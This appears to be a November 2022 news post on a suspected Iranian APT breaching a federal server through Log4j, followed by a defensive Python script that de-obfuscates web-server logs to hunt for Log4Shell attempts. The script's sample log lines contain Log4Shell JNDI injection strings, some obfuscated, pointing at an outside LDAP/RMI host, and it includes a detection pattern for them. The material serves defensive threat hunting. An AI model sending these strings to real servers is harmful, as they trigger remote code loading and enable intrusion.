Suspected Iranian APT accessed federal server via Log4j vulnerability

siteadmin November 15, 2022

A federal agency server was compromised by a suspected Iranian advanced persistent threat (APT) group via the Log4j vulnerability. The threat actors breached a VMware Horizon server, installed cryptomining software, accessed the domain controller, compromised credentials, and installed a reverse proxy service. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation urged affected organizations to assume compromise and initiate threat hunting activities.
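As an added example that is not part of the original report, one place to start the threat hunting CISA and the FBI urge: a small Python check that normalizes the common Log4Shell obfuscations (URL encoding, `${lower:}`/`${upper:}` wrappers and `${:-}` default-value lookups) and flags web-server log lines that carry a JNDI lookup after normalization. The log lines, addresses and paths are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the report); line 0 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Nov/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:389/a}"',
    '198.51.100.7 - - [15/Nov/2022:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}di:${lower:r}mi://198.51.100.7:1099/x}"',
    '198.51.100.7 - - [15/Nov/2022:10:01:05 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    '198.51.100.7%3A389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.85"',
    '198.51.100.7 - - [15/Nov/2022:10:01:06 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:389/a}"',
]

# ${lower:x} / ${upper:x} wrappers around single characters or fragments.
LOWER_UPPER = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.I)
# ${lookup:key:-default} resolves to its default when the lookup is empty, e.g. ${::-j} -> j.
DEFAULT = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')
# What we are hunting for once the layers are peeled back.
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.I)


def normalize(s, max_rounds=10):
    """Repeatedly URL-decode and resolve innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = urllib.parse.unquote(s)
        new = LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == 'lower' else m.group(2).upper(),
            new)
        new = DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            return new
        s = new
    return s  # nesting deeper than max_rounds is itself suspicious; caller still sees the partial form


def hunt(lines):
    """Return the indexes of log lines that contain a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines) if JNDI.search(normalize(line))]


if __name__ == '__main__':
    for i in hunt(SAMPLE_LOGS):
        print(f'line {i}: {normalize(SAMPLE_LOGS[i])}')
```

A match only shows an exploitation attempt reached the logger; corroborate it with outbound LDAP/RMI connections from the Horizon host and with unexpected Java child processes before treating the host as compromised.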